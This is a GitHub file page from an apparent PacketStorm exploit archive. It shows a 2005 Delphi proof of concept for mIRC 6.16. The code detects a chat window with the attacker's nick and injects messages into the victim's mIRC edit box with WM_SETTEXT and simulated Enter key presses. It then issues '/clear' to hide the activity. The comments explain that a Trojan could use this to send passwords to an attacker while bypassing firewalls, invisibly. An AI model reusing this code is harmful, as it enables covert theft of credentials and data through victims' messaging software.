forked from hackernix/PacketStorm-Exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathMIRC.PAS.HTML
More file actions
executable file
·154 lines (136 loc) · 15.6 KB
/
Copy pathMIRC.PAS.HTML
File metadata and controls
executable file
·154 lines (136 loc) · 15.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
<pre>
<code><span style="font: 10pt Courier New;"><span class="pas1-comment">//Mirc 6.16 and "generic Edit component" Win32 trick
//
//by rgod _ May 2, 2005
//
//http://rgod.altervista.org
//
//Naturally you know that you can capture Edit box text
//by sending WM_GETTEXT message to it and set text
//by WM_SETTEXT message. Naturally you know you can simulate
//the pressure of a key.
//And what happens when you use Mirc or other messaging software?
//
//In order to test the program, put a Timer in the form,
//compile with Delphi, you have to open two sessions of mirc,
//you authenticate yourselves in a session and you open a
//query in the other. Now, start the project executable.
//In the victim session move on titlebar, where the alter-ego
// nick is visualized and you enjoy the show...
//Here it is how a Trojan can take advantage of mirc and other
//messaging software in order to send to the attacker
//passwords and other stuff, bypassing firewall rules.
//It can be all invisibile, naturally
//here the code in Object Pascal...
</span><span class="pas1-reservedword">unit</span><span class="pas1-space"> </span><span class="pas1-identifier">Unit1;
</span><span class="pas1-reservedword">interface
uses
</span><span class="pas1-space"> </span><span class="pas1-identifier">Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls;
</span><span class="pas1-reservedword">type
</span><span class="pas1-space"> </span><span class="pas1-identifier">TForm1 = </span><span class="pas1-reservedword">class</span><span class="pas1-symbol">(TForm)
Timer1: TTimer;
</span><span class="pas1-reservedword">procedure</span><span class="pas1-space"> </span><span class="pas1-identifier">Timer1Timer(Sender: TObject);
</span><span class="pas1-comment">{ Private declarations }
</span><span class="pas1-space"> </span><span class="pas1-reservedword">public
</span><span class="pas1-space"> </span><span class="pas1-comment">{ Public declarations }
</span><span class="pas1-space"> </span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">var
</span><span class="pas1-space"> </span><span class="pas1-identifier">Form1: TForm1;
</span><span class="pas1-reservedword">implementation
</span><span class="pas1-preprocessor">{$R *.dfm}
//function that simulate the pressure of a key...
</span><span class="pas1-reservedword">procedure</span><span class="pas1-space"> </span><span class="pas1-identifier">PostKey(key: Word; </span><span class="pas1-reservedword">const</span><span class="pas1-space"> </span><span class="pas1-identifier">shift: TShiftState; specialkey: Boolean);
</span><span class="pas1-reservedword">type
</span><span class="pas1-space"> </span><span class="pas1-identifier">TShiftKeyInfo = </span><span class="pas1-reservedword">record
</span><span class="pas1-space"> </span><span class="pas1-identifier">shift: Byte;
vkey: Byte;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
byteset = </span><span class="pas1-reservedword">set</span><span class="pas1-space"> </span><span class="pas1-reservedword">of</span><span class="pas1-space"> </span><span class="pas1-number">0</span><span class="pas1-symbol">..</span><span class="pas1-number">7</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">const
</span><span class="pas1-space"> </span><span class="pas1-identifier">shiftkeys: </span><span class="pas1-reservedword">array</span><span class="pas1-space"> </span><span class="pas1-symbol">[</span><span class="pas1-number">1</span><span class="pas1-symbol">..</span><span class="pas1-number">3</span><span class="pas1-symbol">] </span><span class="pas1-reservedword">of</span><span class="pas1-space"> </span><span class="pas1-identifier">TShiftKeyInfo =
((shift: Ord(ssCtrl); vkey: VK_CONTROL),
(shift: Ord(ssShift); vkey: VK_SHIFT),
(shift: Ord(ssAlt); vkey: VK_MENU));
</span><span class="pas1-reservedword">var
</span><span class="pas1-space"> </span><span class="pas1-identifier">flag: DWORD;
bShift: ByteSet </span><span class="pas1-reservedword">absolute</span><span class="pas1-space"> </span><span class="pas1-identifier">shift;
i: Integer;
</span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-reservedword">for</span><span class="pas1-space"> </span><span class="pas1-identifier">i := </span><span class="pas1-number">1 </span><span class="pas1-reservedword">to</span><span class="pas1-space"> </span><span class="pas1-number">3 </span><span class="pas1-reservedword">do
</span><span class="pas1-space"> </span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">shiftkeys[i].shift </span><span class="pas1-reservedword">in</span><span class="pas1-space"> </span><span class="pas1-identifier">bShift </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-identifier">keybd_event(shiftkeys[i].vkey, MapVirtualKey(shiftkeys[i].vkey, </span><span class="pas1-number">0</span><span class="pas1-symbol">), </span><span class="pas1-number">0</span><span class="pas1-symbol">, </span><span class="pas1-number">0</span><span class="pas1-symbol">);
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">; </span><span class="pas1-comment">{ For }
</span><span class="pas1-space"> </span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">specialkey </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-identifier">flag := KEYEVENTF_EXTENDEDKEY
</span><span class="pas1-reservedword">else
</span><span class="pas1-space"> </span><span class="pas1-identifier">flag := </span><span class="pas1-number">0</span><span class="pas1-symbol">;
keybd_event(key, MapvirtualKey(key, </span><span class="pas1-number">0</span><span class="pas1-symbol">), flag, </span><span class="pas1-number">0</span><span class="pas1-symbol">);
flag := flag </span><span class="pas1-reservedword">or</span><span class="pas1-space"> </span><span class="pas1-identifier">KEYEVENTF_KEYUP;
keybd_event(key, MapvirtualKey(key, </span><span class="pas1-number">0</span><span class="pas1-symbol">), flag, </span><span class="pas1-number">0</span><span class="pas1-symbol">);
</span><span class="pas1-reservedword">for</span><span class="pas1-space"> </span><span class="pas1-identifier">i := </span><span class="pas1-number">3 </span><span class="pas1-reservedword">downto</span><span class="pas1-space"> </span><span class="pas1-number">1 </span><span class="pas1-reservedword">do
</span><span class="pas1-space"> </span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">shiftkeys[i].shift </span><span class="pas1-reservedword">in</span><span class="pas1-space"> </span><span class="pas1-identifier">bShift </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-identifier">keybd_event(shiftkeys[i].vkey, MapVirtualKey(shiftkeys[i].vkey, </span><span class="pas1-number">0</span><span class="pas1-symbol">),
KEYEVENTF_KEYUP, </span><span class="pas1-number">0</span><span class="pas1-symbol">);
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-comment">//function that find the handle of a controll supplying the handle of the mother window
</span><span class="pas1-reservedword">function</span><span class="pas1-space"> </span><span class="pas1-identifier">FindControl(hApp: HWND; ControlClassName: </span><span class="pas1-reservedword">string</span><span class="pas1-symbol">; ControlNr: Word = </span><span class="pas1-number">1</span><span class="pas1-symbol">):
HWND;
</span><span class="pas1-reservedword">var
</span><span class="pas1-space"> </span><span class="pas1-identifier">i: Word;
hControl: HWND;
</span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-identifier">Result := </span><span class="pas1-number">0</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">IsWindow(hApp) </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-identifier">Dec(ControlNr);
hControl := </span><span class="pas1-number">0</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">for</span><span class="pas1-space"> </span><span class="pas1-identifier">i := </span><span class="pas1-number">0 </span><span class="pas1-reservedword">to</span><span class="pas1-space"> </span><span class="pas1-identifier">ControlNr </span><span class="pas1-reservedword">do
</span><span class="pas1-space"> </span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-identifier">hControl := FindWindowEx(hApp, hControl, PChar(ControlClassName), </span><span class="pas1-reservedword">nil</span><span class="pas1-symbol">);
</span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">hControl = </span><span class="pas1-number">0 </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-identifier">Exit;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
Result := hControl;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">procedure</span><span class="pas1-space"> </span><span class="pas1-identifier">TForm1.Timer1Timer(Sender: TObject);
</span><span class="pas1-reservedword">var
</span><span class="pas1-space"> </span><span class="pas1-identifier">hWnd: THandle;
hedit: THandle;
aName: </span><span class="pas1-reservedword">array</span><span class="pas1-space"> </span><span class="pas1-symbol">[</span><span class="pas1-number">0</span><span class="pas1-symbol">..</span><span class="pas1-number">255</span><span class="pas1-symbol">] </span><span class="pas1-reservedword">of</span><span class="pas1-space"> </span><span class="pas1-identifier">Char;
mytext:</span><span class="pas1-reservedword">array</span><span class="pas1-space"> </span><span class="pas1-symbol">[</span><span class="pas1-number">0</span><span class="pas1-symbol">..</span><span class="pas1-number">10000</span><span class="pas1-symbol">] </span><span class="pas1-reservedword">of</span><span class="pas1-space"> </span><span class="pas1-identifier">char;
query: pchar;
rPos: TPoint;
</span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">Boolean(GetCursorPos(rPos)) </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-identifier">hwnd:=WindowFromPoint(rPos);
sendmessage(hwnd,wm_gettext,</span><span class="pas1-number">10001</span><span class="pas1-symbol">,integer(@mytext));
</span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">Boolean(GetClassName(hWnd, aName, </span><span class="pas1-number">256</span><span class="pas1-symbol">)) </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">strpos(aName,</span><span class="pas1-string">'mIRC_Query'</span><span class="pas1-symbol">) <> </span><span class="pas1-reservedword">nil</span><span class="pas1-space"> </span><span class="pas1-reservedword">then</span><span class="pas1-space"> </span><span class="pas1-comment">//mdiChild classname in Mirc
</span><span class="pas1-space"> </span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">strpos(mytext,</span><span class="pas1-string">'rgod'</span><span class="pas1-symbol">) <> </span><span class="pas1-reservedword">nil</span><span class="pas1-space"> </span><span class="pas1-reservedword">then</span><span class="pas1-space"> </span><span class="pas1-comment">//attacker nick, it is visualized
</span><span class="pas1-space"> </span><span class="pas1-comment">//in mDIChild titlebar
</span><span class="pas1-space"> </span><span class="pas1-comment">//while victim is talking to you
</span><span class="pas1-space">
</span><span class="pas1-reservedword">begin</span><span class="pas1-space"> </span><span class="pas1-comment">//now it will send the message...
</span><span class="pas1-space"> </span><span class="pas1-identifier">hedit:=findcontrol(hWnd,</span><span class="pas1-string">'Edit'</span><span class="pas1-symbol">,</span><span class="pas1-number">1</span><span class="pas1-symbol">);
query:=</span><span class="pas1-string">'hello'</span><span class="pas1-symbol">; </span><span class="pas1-comment">//only 'hello' for this time if before
</span><span class="pas1-space"> </span><span class="pas1-comment">//one has not bring passwords
</span><span class="pas1-space"> </span><span class="pas1-identifier">sendmessage(hedit,wm_settext,</span><span class="pas1-number">0</span><span class="pas1-symbol">,integer(query)); </span><span class="pas1-comment">//paste text
</span><span class="pas1-space"> </span><span class="pas1-comment">//in the edit box
</span><span class="pas1-space"> </span><span class="pas1-identifier">PostKey(</span><span class="pas1-number">13</span><span class="pas1-symbol">, [], False); </span><span class="pas1-comment">//simulate the pressure of Enter
</span><span class="pas1-space"> </span><span class="pas1-identifier">query:=</span><span class="pas1-string">'/clear'</span><span class="pas1-symbol">;
sendmessage(hedit,wm_settext,</span><span class="pas1-number">0</span><span class="pas1-symbol">,integer(query)); </span><span class="pas1-comment">//paste /clear in the edit
</span><span class="pas1-space"> </span><span class="pas1-comment">//box to clear the window, nothing has been
</span><span class="pas1-space"> </span><span class="pas1-comment">//done if you ask to the victim :)
</span><span class="pas1-space"> </span><span class="pas1-identifier">PostKey(</span><span class="pas1-number">13</span><span class="pas1-symbol">, [], False); </span><span class="pas1-comment">//simulate the pressure of Enter
</span><span class="pas1-space"> </span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">.
</span></span>
</code></pre>